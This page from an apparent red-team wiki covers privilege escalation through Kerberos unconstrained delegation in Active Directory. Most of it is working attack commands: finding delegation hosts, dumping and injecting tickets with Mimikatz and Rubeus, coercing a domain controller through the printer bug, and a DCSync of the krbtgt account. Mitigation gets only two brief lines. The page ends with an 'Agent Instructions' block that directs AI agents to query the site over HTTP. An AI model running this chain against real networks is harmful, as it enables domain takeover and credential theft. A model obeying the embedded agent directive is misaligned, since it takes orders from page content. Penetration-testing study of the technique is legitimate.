# Unconstrained Delegation ## General * When set for service account, allows delegation to any service to any resource on the domain as a user * When enabled, DC places user's TGT inside TGS when user requests access to service with unconstrained delegation enabled * Server extracts TGT from TGS and stores it in LSASS * Server can reuse the user's TGT to access resoruces * Escalate privileges when extracting TGT from Domain Admins or other HVTs * Note: need local admin access on the machine to extract tickets ## Exploitation ```powershell # Get computers that have unconstrained delegation enabled # Using PowerView Get-NetComputer -Unconstrained # Using AD Module Get-ADComputer -Filter { TrustedForDelegation -eq $true } Get-ADUser -Filter { TrustedForDelegation -eq $true } # ldapdomaindump ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10 grep TRUSTED_FOR_DELEGATION domain_computers.grep # CrackMapExec crackmapexec ldap 10.10.10.10 -u username -p password --trusted-for-delegation # Monitor DA logins on computer Invoke-UserHunter -ComputerName dcorp-appsrv -Poll 100 -UserName Administrator -Delay 5 -Verbose # Check if we have local admin access on that machine using PowerView Find-LocalAdminAccess -ComputerName dcorp-appsrv # Get session on machine as local admin and check for tickets Invoke-Mimikatz -Command '"sekurlsa::tickets"' # Export tickets Invoke-Mimikatz -Command '"sekurlsa::tickets /export"' # Inject ticket into session Invoke-Mimikatz -Command '"kerberos:ptt ticket.kirbi"' ``` ## Printer Bug * Trick HVT to connect to machine with Unconstrained Delegation enabled * Force Domain Admin to connect to specific machine * ```powershell # Start capturing for TGTs using Rubeus .\Rubeus.exe monitor /interval:5 /nowrap # Run MS-RPRN.exe .\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appserv.dollarcorp.moneycorp.local # From https://github.com/leechristensen/SpoolSample .\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME .\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB # DC01.HACKER.LAB is the domain controller we want to compromise # HELPDESK.HACKER.LAB is the machine with delegation enabled that we control. # From https://github.com/dirkjanm/krbrelayx printerbug.py 'domain/username:password'@ # From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689 python dementor.py -d domain -u username -p password # Copy base64 encoded TGT, remove extra spaces and inject it on attacker machine .\Rubeus.exe ptt /ticket:ticket.kirbi # Run DCSync Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"' ``` ## Mitigation * Limit DA/Admin logins to specific servers * Set "Account is sensitive and cannot be delegated" for privileged accounts ## Further Reading * [HackTricks: Unconstrained Delegation](https://book.hacktricks.xyz/windows/active-directory-methodology/unconstrained-delegation) * [PayloadsAllTheThings: Kerberos Unconstrained Delegation](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#kerberos-unconstrained-delegation) * [iRedTeam: Kerberos Unconstrained Delegation](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-unrestricted-kerberos-delegation) * [iRedTeam: Domain Compromise via DC Print Server and Kerberos Delegation](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/domain-compromise-via-dc-print-server-and-kerberos-delegation) * [Security Focus: Analysing Account is Sensitive and cannot be Delegated for Privileged Accounts](https://docs.microsoft.com/en-us/archive/blogs/poshchap/security-focus-analysing-account-is-sensitive-and-cannot-be-delegated-for-privileged-accounts) * [SpecterOps: Hunting in Active Directory: Unconstrained Delegation & Forest Trusts](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.bufu-sec.com/active-directory/privilege_escalation/unconstrained_delegation.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.